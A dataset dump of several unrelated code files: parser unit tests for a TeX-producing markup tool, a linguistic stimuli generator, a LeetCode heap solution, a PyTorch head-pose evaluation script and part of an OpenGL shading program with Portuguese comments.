\\\n \"Fake=Test\\n\", \\\n \"\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst4\n self.parser._get_header()\n\n\n def test_custom_delimeters(self):\n tst1 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_DLM+\"=\"+\\\n const.ID_TABLE+\":lmno,//\"+\\\n const.ID_BOLD+\":+s,s+//\"+\\\n const.ID_LIST_UNO+\":+,//\"+\\\n const.ID_M_INL+\":+%,%+\\n\",\n \"\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.parser._get_header()\n self.assertEqual(self.parser.delims[const.ID_BOLD][0], \"+s\")\n self.assertEqual(self.parser.delims[const.ID_BOLD][1], \"s+\")\n self.assertEqual(self.parser.delims[const.ID_M_INL][0], \"+%\")\n self.assertEqual(self.parser.delims[const.ID_M_INL][1], \"%+\")\n self.assertEqual(self.parser.delims[const.ID_LIST_UNO], \"+\")\n self.assertEqual(self.parser.delims[const.ID_TABLE], \"lmno\")\n\n with self.assertRaises(SystemExit):\n tst2 = [const.ID_HDR_DLM+\"=\"+\\\n const.ID_TABLE+\":lmno,onml//\"+\\\n const.ID_M_INL+\":+%,%+\\n\",\n \"\\n\"]\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.parser._get_header()\n\n def test_custom_setup(self):\n sep = self.delims[const.ID_SEPR]\n\n tst1 = [const.ID_HDR_TIT+\"=Testing Headers\\n\", \\\n const.ID_HDR_PAM+\"=\\\\documentclass[letter]{article}\"+sep+\"\\n\", \\\n \" \"*8 + \"\\\\begin{document}\\n\", \\\n \"\\n\"]\n\n res1 = [[(const.ID_HDR_PAM, \\\n \"\\\\documentclass[letter]{article}\\n\\\\begin{document}\\n\")]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._get_header(), res1)\n\n\n def test_is_section(self):\n sec1 = self.delims[const.ID_SEC_ONE]\n sec2 = self.delims[const.ID_SEC_TWO]\n sec3 = self.delims[const.ID_SEC_THR]\n\n self.assertEqual(self.parser._is_section(sec1+\"Blah\"), True)\n self.assertEqual(self.parser._is_section(sec2+\"Section\"), True)\n self.assertEqual(self.parser._is_section(sec3+\"Test\"), True)\n 
self.assertEqual(self.parser._is_section(\"& Blah\"), False)\n\n def test_is_list(self):\n uno_lst_delim = self.delims[const.ID_LIST_UNO]\n\n self.assertEqual(self.parser._is_list(uno_lst_delim+\" Blah\"), True)\n self.assertEqual(self.parser._is_list(uno_lst_delim+\"Section\"), True)\n self.assertEqual(self.parser._is_list(\"1.Test\"), True)\n self.assertEqual(self.parser._is_list(\"7.Test\"), True)\n self.assertEqual(self.parser._is_list(\".Test\"), False)\n self.assertEqual(self.parser._is_list(\" 7.Test\"), True)\n self.assertEqual(self.parser._is_list(\" \"*12+uno_lst_delim+\"Test\"), True)\n self.assertEqual(self.parser._is_list(\" \"*12+\"Test\"+uno_lst_delim+\"Blah\"), False)\n self.assertEqual(self.parser._is_list(\"Stuff 7.Test\"), False)\n self.assertEqual(self.parser._is_list(\"2Stuff. Test\"), False)\n\n def test_is_verbatim(self):\n vrb = self.delims[const.ID_V_BLK][0]\n\n self.assertEqual(self.parser._is_verbatim(vrb+\" Blah\"), True)\n self.assertEqual(self.parser._is_verbatim(vrb+\"Section\"), True)\n self.assertEqual(self.parser._is_verbatim(\"Test\"), False)\n\n def test_is_table(self):\n tbl = self.delims[const.ID_TABLE]\n\n self.assertEqual(self.parser._is_table(tbl+\" Blah\"), True)\n self.assertEqual(self.parser._is_table(tbl+\"Section\"), True)\n self.assertEqual(self.parser._is_table(\"Test\"), False)\n\n def test_is_image(self):\n img = self.delims[const.ID_IMAGE]\n\n self.assertEqual(self.parser._is_image(img+\" Blah\"), True)\n self.assertEqual(self.parser._is_image(img+\"Section\"), True)\n self.assertEqual(self.parser._is_image(\"Test\"), False)\n\n def test_is_raw_tex(self):\n rtex = self.delims[const.ID_T_BLK][0]\n\n self.assertEqual(self.parser._is_raw_tex(rtex+\" Blah\"), True)\n self.assertEqual(self.parser._is_raw_tex(rtex+\"Section\"), True)\n self.assertEqual(self.parser._is_raw_tex(\"Test\"), False)\n\n def test_make_section(self):\n sec1 = self.delims[const.ID_SEC_ONE]\n sec2 = self.delims[const.ID_SEC_TWO]\n sec3 = self.delims[const.ID_SEC_THR]\n\n tsts = [sec1+\"Test One\\n\", \\\n sec2+\"Test Two\\n\", \\\n sec3+\"Test Three\\n\"]\n\n ress = [[const.ID_SEC, [const.ID_SEC_ONE, \"Test One\"]], \\\n [const.ID_SEC, [const.ID_SEC_TWO, \"Test Two\"]], \\\n [const.ID_SEC, [const.ID_SEC_THR, \"Test Three\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tsts\n\n self.assertEqual(self.parser._make_section(), ress[0])\n self.assertEqual(self.parser._make_section(), ress[1])\n self.assertEqual(self.parser._make_section(), ress[2])\n\n def test_make_verbatim(self):\n vstr, vend = self.delims[const.ID_V_BLK]\n\n tst1 = [vstr+\"Test Caption\\n\", \\\n \"def test_make_verbatim(self):\\n\", \\\n \" pass\"+vend]\n res1 = [const.ID_V_BLK, [\"Test Caption\", \\\n [\"def test_make_verbatim(self):\", \" pass\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_verbatim(), res1)\n\n tst2 = [vstr+\"Another Test\\n\", \\\n \" def test_indentation(self):\\n\", \\\n \" 8 spaces\"+vend]\n res2 = [const.ID_V_BLK, [\"Another Test\", \\\n [\" def test_indentation(self):\", \" 8 spaces\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._make_verbatim(), res2)\n\n tst3 = [\" \"*8+vstr+\"Another Test\\n\", \\\n \" \"*8+\" def test_indentation(self):\\n\", \\\n \" \"*8+\" 8 spaces\"+vend]\n res3 = [const.ID_V_BLK, [\"Another Test\", \\\n [\" def test_indentation(self):\", \" 8 spaces\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n 
self.assertEqual(self.parser._make_verbatim(), res3)\n\n tst4 = [vstr+\"\\n\", \\\n \" def test_indentation(self):\\n\", \\\n \" 8 spaces\"+vend]\n res4 = [const.ID_V_BLK, [\"\", \\\n [\" def test_indentation(self):\", \" 8 spaces\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst4\n self.assertEqual(self.parser._make_verbatim(), res4)\n\n\n\n def test_separate_lists(self):\n udlm = self.delims[const.ID_LIST_UNO]\n\n tst1 = [udlm+\"First level\", \\\n \" \"*4+udlm+\"Second level\", \\\n \" \"*8+udlm+\"Third level\", \\\n udlm+\"Back to first level\", \\\n \" \"*4+\"1. Numbered\", \\\n \" \"*8+\"2. Second numbered item\"]\n res1 = [const.ID_LIST_UNO, [\"First level\", \\\n [const.ID_LIST_UNO, [\"Second level\", \\\n [const.ID_LIST_UNO, [\"Third level\"]]]], \\\n \"Back to first level\", \\\n [const.ID_LIST_NUM, [\"Numbered\", \\\n [const.ID_LIST_NUM, [\"Second numbered item\"]]]]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._separate_lists(tst1), (res1, 0))\n\n tst2 = [udlm+\"First\", \\\n \" \"*4+udlm+\"Second\", \\\n \"continuing a line.\", \\\n \" \"*8+udlm+\"Third\", \\\n \" longer on the third line\", \\\n \" plus a little more\", \\\n \" and done.\", \\\n udlm+\"First\"]\n res2 = [const.ID_LIST_UNO, [\"First\", \\\n [const.ID_LIST_UNO, [\"Second continuing a line.\", \\\n [const.ID_LIST_UNO, [\"Third longer on the third line \"+\\\n \"plus a little more and done.\"]]]], \\\n \"First\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._separate_lists(tst2), (res2, 4))\n\n with self.assertRaises(SystemExit):\n tst3 = [udlm+\"First\", \\\n \" \"*4+udlm+\"Second\", \\\n \" \"*8+udlm+\"Third\", \\\n \" \"*12+udlm+\"Fourth\", \\\n \" \"*16+udlm+\"Fifth\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.parser._separate_lists(tst3)\n\n\n def test_make_list(self):\n udlm = self.delims[const.ID_LIST_UNO]\n\n tst1 = [udlm+\"First\\n\", \\\n udlm+\"Second\\n\", \\\n \"\\n\"]\n res1 = [const.ID_LIST, [const.ID_LIST_UNO, [ \\\n \"First\", \"Second\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_list(), res1)\n\n def test_make_image(self):\n img = self.delims[const.ID_IMAGE]\n sep = self.delims[const.ID_SEPR]\n\n tst1 = [img+\" Caption \"+sep+\" ../example/example_image.jpg\"]\n res1 = [const.ID_IMAGE, [\"Caption\", \\\n \"/home/shahzeb/sketchbook/texless/example/example_image.jpg\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_image(), res1)\n\n with self.assertRaises(SystemExit):\n tst2 = [img+\" Caption \"+\".\"+\" ../example/example_image.jpg\"]\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.parser._make_image()\n\n tst3 = [img+\" Caption \"+\".\"+\" example_image.jpg\"]\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.parser._make_image()\n\n def test_make_table(self):\n tbl = self.delims[const.ID_TABLE]\n sep = self.delims[const.ID_SEPR]\n\n tst1 = [tbl+\"2\"+sep+\"Caption\\n\", \\\n \"(0,0)\"+sep+\"(0,1)\\n\", \\\n \"(1,0)\"+sep+\"(1,1)\\n\"]\n res1 = [const.ID_TABLE, [\"Caption\", [ \\\n [\"(0,0)\", \"(0,1)\"], \\\n [\"(1,0)\", \"(1,1)\"]]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_table(), res1)\n\n with self.assertRaises(SystemExit):\n tst2 = [tbl+\"2\"+\".\"+\"Caption\\n\", \\\n \"(0,0)\"+sep+\"(0,1)\\n\", \\\n \"(1,0)\"+sep+\"(1,1)\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = 
tst2\n self.parser._make_table()\n\n tst3 = [tbl+\"2\"+sep+\"Caption\\n\", \\\n \"(0,0)\"+sep+\"(0,1)\\n\", \\\n \"(1,0)\"+sep+\"(1,1)\"+sep+\"(1,2)\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.parser._make_table()\n\n def test_make_raw_tex(self):\n rstr, rend = self.delims[const.ID_T_BLK]\n\n tsts = [rstr+\"This has a {\\\\bf bold} line\"+rend, \\\n rstr+\"This has !x=y! some math.\"+rend, \\\n rstr+\"Test with nothing in it.\"+rend]\n ress = [[const.ID_T_BLK, [\"This has a {\\\\bf bold} line\"]], \\\n [const.ID_T_BLK, [\"This has !x=y! some math.\"]], \\\n [const.ID_T_BLK, [\"Test with nothing in it.\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tsts\n\n self.assertEqual(self.parser._make_raw_tex(), ress[0])\n self.assertEqual(self.parser._make_raw_tex(), ress[1])\n self.assertEqual(self.parser._make_raw_tex(), ress[2])\n\n def test_make_paragraph(self):\n udlm = self.delims[const.ID_LIST_UNO]\n\n tst1 = [\"Just some lines.\\n\", \\\n \"To test our paragraphs.\\n\", \\\n \"Now done.\\n\"]\n res1 = [const.ID_PARA, [ \\\n \"Just some lines.\", \\\n \"To test our paragraphs.\", \\\n \"Now done.\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_paragraph(), res1)\n\n tst2 = [\"Introduction to a list:\\n\", \\\n udlm+\"Item one.\\n\", \\\n udlm+\"Item two.\\n\", \\\n \"\\n\"]\n res2 = [const.ID_PARA, [ \\\n \"Introduction to a list:\", \\\n [const.ID_LIST, [const.ID_LIST_UNO, [ \\\n \"Item one.\", \"Item two.\"]]]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._make_paragraph(), res2)\n\n\n def test_make_math(self):\n mstr, mend = self.delims[const.ID_M_BLK]\n\n tsts = [mstr+\"\\\\sum\"+mend+'\\n', \\\n mstr+\"x = y = z + 4\"+mend+'\\n', \\\n mstr+\"\\\\frac{1}{x}\"+mend+'\\n']\n ress = [\"\\\\sum\", \\\n \"x = y = z + 4\", \\\n \"\\\\frac{1}{x}\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tsts\n\n self.assertEqual(self.parser._make_math(), [const.ID_M_BLK, [ress[0]]])\n self.assertEqual(self.parser._make_math(), [const.ID_M_BLK, [ress[1]]])\n self.assertEqual(self.parser._make_math(), [const.ID_M_BLK, [ress[2]]])\n\n def test_make_comment(self):\n cstr, cend = self.delims[const.ID_CMT]\n\n tst1 = [cstr+\"Comment one.\\n\", \\\n \"Comment two.\"+cend+\"\\n\", \\\n \"Extra line.\"]\n res1 = [const.ID_CMT, [ \\\n \"Comment one.\", \"Comment two.\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_comment(), res1)\n\nclass TestTexGenerator(unittest.TestCase):\n \"\"\"\n TexGenerator is the class that will take the\n output from NotParse, which has data attached\n to labels, and place the correct output in the\n correct place.\n\n We will not test most of it because the\n easiest way to test this class is to just\n try to compile the output with pdflatex.\n\n We will just test the header to confirm our\n settings are being handled correctly.\n\n \"\"\"\n\n def setUp(self):\n fake_flags = collections.namedtuple('Fake_Flags', ['m', 'w'])\n fake_flags.m = False\n\n self.gen = texgenerator.TexGenerator(\"blah\", fake_flags, \\\n [], test_mode=True)\n\n for key, val in self.gen.tex_repl.items():\n if isinstance(val, tuple):\n self.gen.tex_repl[key] = tuple('~'*len(val))\n else:\n self.gen.tex_repl[key] = '~'\n\n def test_make_header(self):\n tst1 = [(const.ID_HDR_TIT, \"Title\"), \\\n (const.ID_HDR_DAT, \"August\")]\n res1 = \"~~~~Title~~August~~\"\n\n self.gen.parsed = [tst1]\n 
self.assertEqual(self.gen._make_header(), res1)\n\n def test_custom_setup(self):\n cust_setup = \"This is pretend tex setup\"\n tst1 = [(const.ID_HDR_TIT, \"Title\"), \\\n (const.ID_HDR_PAM, cust_setup)]\n res1 = \"This is pretend tex setup\"\n\n self.gen.parsed = [tst1]\n self.gen._make_header()\n\n self.assertEqual(self.gen._make_header(), res1)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":23697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"89496880","text":"\nnonce_file = \"./pilot-nonce-roots.txt\"\nnoun_file = \"./pilot-noun-contexts.txt\"\nverb_file = \"./pilot-verb-contexts.txt\"\nadjective_file = \"./pilot-adjective-contexts.txt\"\nstimuli_file = \"./pilot-nonce-stimuli.txt\"\n\ndef read_file(file_name):\n category = file_name.split(\"-\")[1]\n items = []\n with open(file_name) as f:\n for line in f.readlines():\n l = line.strip()\n if len(l) >= 1:\n items.append((category,l))\n return items\n\ndef create_stimuli(roots, contexts):\n stimuli = []\n for i, (item,root) in enumerate(roots):\n condition = i + 1\n for category,context in contexts:\n root_mod = root\n if category != \"noun\" and root[-1] == \"e\":\n root_mod = root[:-1]\n prompt = context.replace(\"XXX\", root)\n prompt = prompt.replace(\"YYY\", str(root_mod+\"[BLANK1]\"), 1).replace(\"YYY\", str(root_mod+\"[BLANK1]\"), 1)\n stimulus = \"{condition: \\\"\" + str(condition) + \"\\\", item: \\\"\" + item + \"\\\", category: \\\"\" + category + \"\\\", context: \\\"\" + context + \"\\\", root: \\\"\" + root + \"\\\", prompt: \\\"\" + prompt + \"\\\"}\"\n stimuli.append(stimulus)\n condition = (condition + 1) % 30\n return stimuli\n\n\n### MAIN ###\nroots = read_file(nonce_file)\ncontexts = read_file(noun_file) + read_file(verb_file) + read_file(adjective_file)\nstimuli = create_stimuli(roots, contexts)\n\nwith open(stimuli_file, \"w\") as f:\n for stimulus in stimuli:\n f.write(stimulus)\n f.write(\",\\n\")\n","sub_path":"human_generalization/experiments/03_experiment/stimuli/experiment3-make_stimuli.py","file_name":"experiment3-make_stimuli.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"629626683","text":"'''\nYou are given a 0-indexed integer array costs where costs[i] is the cost of hiring the ith worker.\n\nYou are also given two integers k and candidates. We want to hire exactly k workers according to the following rules:\n\nYou will run k sessions and hire exactly one worker in each session.\nIn each hiring session, choose the worker with the lowest cost from either the first candidates workers or the last candidates workers. Break the tie by the smallest index.\nFor example, if costs = [3,2,7,7,1,2] and candidates = 2, then in the first hiring session, we will choose the 4th worker because they have the lowest cost [3,2,7,7,1,2].\nIn the second hiring session, we will choose 1st worker because they have the same lowest cost as 4th worker but they have the smallest index [3,2,7,7,2]. Please note that the indexing may be changed in the process.\nIf there are fewer than candidates workers remaining, choose the worker with the lowest cost among them. 
Break the tie by the smallest index.\nA worker can only be chosen once.\nReturn the total cost to hire exactly k workers.\n\n\n\nExample 1:\n\nInput: costs = [17,12,10,2,7,2,11,20,8], k = 3, candidates = 4\nOutput: 11\nExplanation: We hire 3 workers in total. The total cost is initially 0.\n- In the first hiring round we choose the worker from [17,12,10,2,7,2,11,20,8]. The lowest cost is 2, and we break the tie by the smallest index, which is 3. The total cost = 0 + 2 = 2.\n- In the second hiring round we choose the worker from [17,12,10,7,2,11,20,8]. The lowest cost is 2 (index 4). The total cost = 2 + 2 = 4.\n- In the third hiring round we choose the worker from [17,12,10,7,11,20,8]. The lowest cost is 7 (index 3). The total cost = 4 + 7 = 11. Notice that the worker with index 3 was common in the first and last four workers.\nThe total hiring cost is 11.\nExample 2:\n\nInput: costs = [1,2,4,1], k = 3, candidates = 3\nOutput: 4\nExplanation: We hire 3 workers in total. The total cost is initially 0.\n- In the first hiring round we choose the worker from [1,2,4,1]. The lowest cost is 1, and we break the tie by the smallest index, which is 0. The total cost = 0 + 1 = 1. Notice that workers with index 1 and 2 are common in the first and last 3 workers.\n- In the second hiring round we choose the worker from [2,4,1]. The lowest cost is 1 (index 2). The total cost = 1 + 1 = 2.\n- In the third hiring round there are less than three candidates. We choose the worker from the remaining workers [2,4]. The lowest cost is 2 (index 0). The total cost = 2 + 2 = 4.\nThe total hiring cost is 4.\n\n\nConstraints:\n\n1 <= costs.length <= 10^5\n1 <= costs[i] <= 10^5\n1 <= k, candidates <= costs.length\n'''\nimport unittest\n\nfrom typing import *\nfrom heapq import heappush, heappop, heapify\n\nclass Solution:\n    def totalCost(self, costs: List[int], k: int, candidates: int) -> int:\n        left_heap = costs[:candidates]\n        right_heap = costs[max(len(costs) - candidates, candidates):]\n        res = 0\n        heapify(left_heap)\n        heapify(right_heap)\n\n        start = candidates\n        end = max(len(costs) - candidates, candidates) - 1\n        for _ in range(k):\n            if left_heap and right_heap:\n                if left_heap[0] <= right_heap[0]:\n                    res += heappop(left_heap)\n                    if start <= end:\n                        heappush(left_heap, costs[start])\n                        start += 1\n                else:\n                    res += heappop(right_heap)\n                    if start <= end:\n                        heappush(right_heap, costs[end])\n                        end -= 1\n            elif not left_heap and not right_heap:\n                break\n            elif not left_heap:\n                res += heappop(right_heap)\n                if start <= end:\n                    heappush(right_heap, costs[end])\n                    end -= 1\n            else:\n                res += heappop(left_heap)\n                if start <= end:\n                    heappush(left_heap, costs[start])\n                    start += 1\n        return res\n\n\nclass TestSolution(unittest.TestCase):\n\n    def test_case(self):\n        examples = (\n            (([17,12,10,2,7,2,11,20,8], 3, 4), 11),\n            (([1,2,4,1], 3, 3), 4),\n        )\n        for first, second in examples:\n            self.assert_function(first, second)\n\n    def assert_function(self, first, second):\n        self.assertEqual(Solution().totalCost(*first), second,\n                         msg=\"first: {}; second: {}\".format(first, second))\n\n\nunittest.main()\n","sub_path":"Leetcode/2462. 
Total Cost to Hire K Workers.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"401722014","text":"import sys, os, argparse\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\n\nimport datasets, posenet, utils\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='Head pose estimation using the Hopenet network.')\n parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',\n default=0, type=int)\n parser.add_argument('--data_dir', dest='data_dir', help='Directory path for data.',\n default='', type=str)\n parser.add_argument('--filename_list', dest='filename_list', help='Path to text file containing relative paths for every example.',\n default='', type=str)\n parser.add_argument('--snapshot', dest='snapshot', help='Name of model snapshot.',\n default='', type=str)\n parser.add_argument('--save_viz', dest='save_viz', help='Save images with pose cube.',\n default=False, type=bool)\n parser.add_argument('--dataset', dest='dataset', help='Dataset type.', default='AFLW2000', type=str)\n parser.add_argument('--max_angle', dest='max_angle', help='Max angle.',\n default=99, type=int)\n parser.add_argument('--bin_angle', dest='bin_angle', help='Bin angle.',\n default=3, type=int)\n\n args = parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n\n cudnn.enabled = True\n gpu = args.gpu_id\n snapshot_path = args.snapshot\n\n max_angle = args.max_angle\n angles_per_bin = args.bin_angle\n bins = (max_angle * 2) // angles_per_bin\n\n # ResNet50 structure\n model = posenet.PoseNet(angles_per_bin, max_angle)\n\n print('Loading snapshot.')\n # Load snapshot\n saved_state_dict = torch.load(snapshot_path)\n model.load_state_dict(saved_state_dict)\n\n print('Loading data.')\n\n transformations = transforms.Compose([transforms.Scale(224),\n transforms.CenterCrop(224), transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\n data_dir = os.path.join('Data\\\\RAW', args.data_dir)\n\n if args.dataset == 'Pose_300W_LP_Training':\n pose_dataset = datasets.Pose_300W_LP_Training(data_dir, args.filename_list, transformations)\n elif args.dataset == 'AFLW2000':\n pose_dataset = datasets.AFLW2000(data_dir, args.filename_list, transformations)\n else:\n print('Error: not a valid dataset name')\n sys.exit()\n test_loader = torch.utils.data.DataLoader(dataset=pose_dataset,\n batch_size=1,\n num_workers=2)\n\n model.cuda(gpu)\n\n print('Ready to test network.')\n\n # Test the Model\n model.eval() # Change model to 'eval' mode (BN uses moving mean/var).\n total = 0\n\n idx_tensor = range(bins)\n idx_tensor = torch.FloatTensor(idx_tensor).cuda(gpu)\n\n yaw_error = .0\n pitch_error = .0\n roll_error = .0\n\n for i, (images, labels, cont_labels, name) in enumerate(test_loader):\n images = Variable(images).cuda(gpu)\n total += cont_labels.size(0)\n\n label_yaw = cont_labels[:,0].float()\n label_pitch = cont_labels[:,1].float()\n label_roll = cont_labels[:,2].float()\n\n yaw, pitch, roll = model(images)\n\n # Continuous predictions\n yaw_predicted = utils.softmax_temperature(yaw.data, 1)\n pitch_predicted = 
utils.softmax_temperature(pitch.data, 1)\n roll_predicted = utils.softmax_temperature(roll.data, 1)\n\n yaw_predicted = torch.sum(yaw_predicted * idx_tensor, 1).cpu() * angles_per_bin - max_angle\n pitch_predicted = torch.sum(pitch_predicted * idx_tensor, 1).cpu() * angles_per_bin - max_angle\n roll_predicted = torch.sum(roll_predicted * idx_tensor, 1).cpu() * angles_per_bin - max_angle\n\n # Mean absolute error\n yaw_error += torch.sum(torch.abs(yaw_predicted - label_yaw))\n pitch_error += torch.sum(torch.abs(pitch_predicted - label_pitch))\n roll_error += torch.sum(torch.abs(roll_predicted - label_roll))\n\n # Save first image in batch with pose cube or axis.\n if args.save_viz:\n name = name[0]\n if args.dataset == 'BIWI':\n cv2_img = cv2.imread(os.path.join(data_dir, name + '_rgb.png'))\n else:\n cv2_img = cv2.imread(os.path.join(data_dir, name + '.jpg'))\n\n predicted = 'y %.2f, p %.2f, r %.2f' % (yaw_predicted.item(), pitch_predicted.item(), roll_predicted.item())\n actual = 'y %.2f, p %.2f, r %.2f' % (label_yaw.item(), label_pitch.item(), label_roll.item())\n error_string = 'y %.2f, p %.2f, r %.2f' % (torch.sum(torch.abs(yaw_predicted - label_yaw)), torch.sum(torch.abs(pitch_predicted - label_pitch)), torch.sum(torch.abs(roll_predicted - label_roll)))\n cv2.putText(cv2_img, predicted, (30, cv2_img.shape[0] - 90), fontFace=1, fontScale=1, color=(0,255,0), thickness=2)\n cv2.putText(cv2_img, actual, (30, cv2_img.shape[0] - 60), fontFace=1, fontScale=1, color=(0,255,255), thickness=2)\n cv2.putText(cv2_img, error_string, (30, cv2_img.shape[0] - 30), fontFace=1, fontScale=1, color=(0,0,255), thickness=2)\n\n utils.draw_axis_rads(cv2_img, *np.radians([yaw_predicted[0], pitch_predicted[0], roll_predicted[0]]))\n\n utils.draw_axis_rads(cv2_img, *np.radians([label_yaw[0], label_pitch[0], label_roll[0]]), cx=(255,255,0), cy=(255,0,255), cz=(0, 255, 255))\n\n cv2.imwrite(os.path.join('output\\\\images', name + '.jpg'), cv2_img)\n\n print('Test error in degrees of the model on the ' + str(total) +\n ' test images. Yaw: %.4f, Pitch: %.4f, Roll: %.4f, MAE: %.4f' % (yaw_error / total,\n pitch_error / total, roll_error / total, (yaw_error + pitch_error + roll_error) / (3.0 * total)))\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648988846","text":"#%%\n'''\n Nesta cela ocorre a chamada das dependências. Se o GLFW3 não estiver instalado no sistema, será lançada uma exceção\n aqui.\n'''\n\nfrom OpenGL.GL import *\nfrom OpenGL.GL import shaders\nfrom OpenGL.GLU import *\nimport pyrr\nimport glfw\nimport numpy\n\n\n#%%\n'''\n As shaders são onde ocorre a maior parte da operação de iluminação, portanto elas serão descritas com detalhe nesta\n cela.\n \n A vertex shader recebe como input a posição do vértice em coordenadas do modelo e um parâmetro \"opcional\", as\n normais do vértice (isso ocorre porque as funções gluSphere() e gluCylinder() não passam normais de vértice como\n input para shaders e o Teapot passa, mas isso será explicado com mais detalhes depois). 
Por default, o parâmetro \n vertex_normal foi declarado como (0.0, 0.0, 0.0) no código, no caso da esfera e do cilindro, para que ele seja\n calculado na própria shader.\n \n A shader também recebe como uniform a matriz modelo, matriz da câmera e matriz de projeção perspectiva, além da\n posição da câmera (importante para o cálculo da luz especular), as três cores do albedo e a constante especular\n (importantes para o cálculo da cor do vértice, usada no sombreamento de Gouraud). As saídas para a fragment shader\n são a posição do pixel no espaço do modelo e no espaço de visualização, a cor do vértice, a posição da câmera, a \n normal, uma fonte de luz declarada na própria shader e um vetor de luz ambiente, que é uma função da cor do\n material. Posições e normais são automaticamente interpoladas entre as shaders.\n \n O cálculo da normal, se necessário, é feito a partir do valor da posição do vértice no espaço do modelo. Isso ocorre\n porque em uma esfera, a normal é apenas o ponto menos o centro da esfera (no caso, estamos falando de coordenadas\n do modelo, então este centro é (0.0, 0.0, 0.0)). A mesma operação pode ser feita para o cilindro. Caso contrário, \n será usada a normal do vértice que foi recebida como input.\n \n A seguir, é calculado a cor de cada vértice, de acordo com o modelo de iluminação de Phong, mais a luz ambiente. O\n resultado é passado adiante para a fragment shader.\n'''\n\n# shaders\nvertex_shader = '''\n#version 330\nuniform mat4 model_transform;\nuniform mat4 camera;\nuniform mat4 projection;\nuniform vec3 camera_pos_input;\n\nuniform float albedo_r;\nuniform float albedo_g;\nuniform float albedo_b;\nuniform float ks;\n\nin vec3 position;\nin vec3 vertex_normal;\n\nout vec3 view_position;\nout vec3 pixel_position;\nout vec3 vertex_color;\nout vec3 camera_position;\nout vec3 normal;\nout vec3 light_source;\nout vec4 ambient_light;\n\nvoid main()\n{\n gl_Position = projection * camera * model_transform * vec4(position, 1.0);\n view_position = gl_Position.xyz;\n pixel_position = position;\n camera_position = camera_pos_input;\n if(vertex_normal == vec3(0.0, 0.0, 0.0))\n {\n normal = normalize(position);\n }\n else\n {\n normal = normalize(vertex_normal);\n }\n \n light_source = vec3(5.0, 20.0, 10.0);\n float diffuse_red = albedo_r / 3.14 * dot(normal, light_source);\n float diffuse_green = albedo_g / 3.14 * dot(normal, light_source);\n float diffuse_blue = albedo_b / 3.14 * dot(normal, light_source);\n ambient_light = vec4(albedo_r/3.14, albedo_g/3.14, albedo_b/3.14, 0.0);\n\n vec3 reflection_vec = 2.0 * dot(light_source, normal) * normal - light_source;\n float specular = ks * dot(reflection_vec, normalize(camera_position));\n \n specular = max(0.0, specular);\n diffuse_red = max(0.0, diffuse_red);\n diffuse_green = max(0.0, diffuse_green);\n diffuse_blue = max(0.0, diffuse_blue);\n \n vertex_color = vec3(diffuse_red + specular, diffuse_green + specular, diffuse_blue + specular) + ambient_light.rgb;\n}\n'''\n\n'''\n Fragment shader: é aqui que ocorre o output da cor do pixel. No caso, ela recebe como inputs os outputs da vertex\n shader, e como uniforms os mesmos parâmetros para calcular a cor de acordo com o modelo de iluminação de Phong, mais\n um inteiro shading_type, que determina o tipo de sombreamento que será feito: 0 = flat, 1 = Gouraud e 2 = Phong.\n \n No caso do flat shading, a normal da face é calculada como o produto vetorial entre as derivadas discretas em função \n de x e y da posição do pixel. 
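A rough CPU-side analogue of that flat-shading trick, assuming three model-space triangle vertices as NumPy arrays (hypothetical helper, not part of the program above):

import numpy as np

def face_normal(p0, p1, p2):
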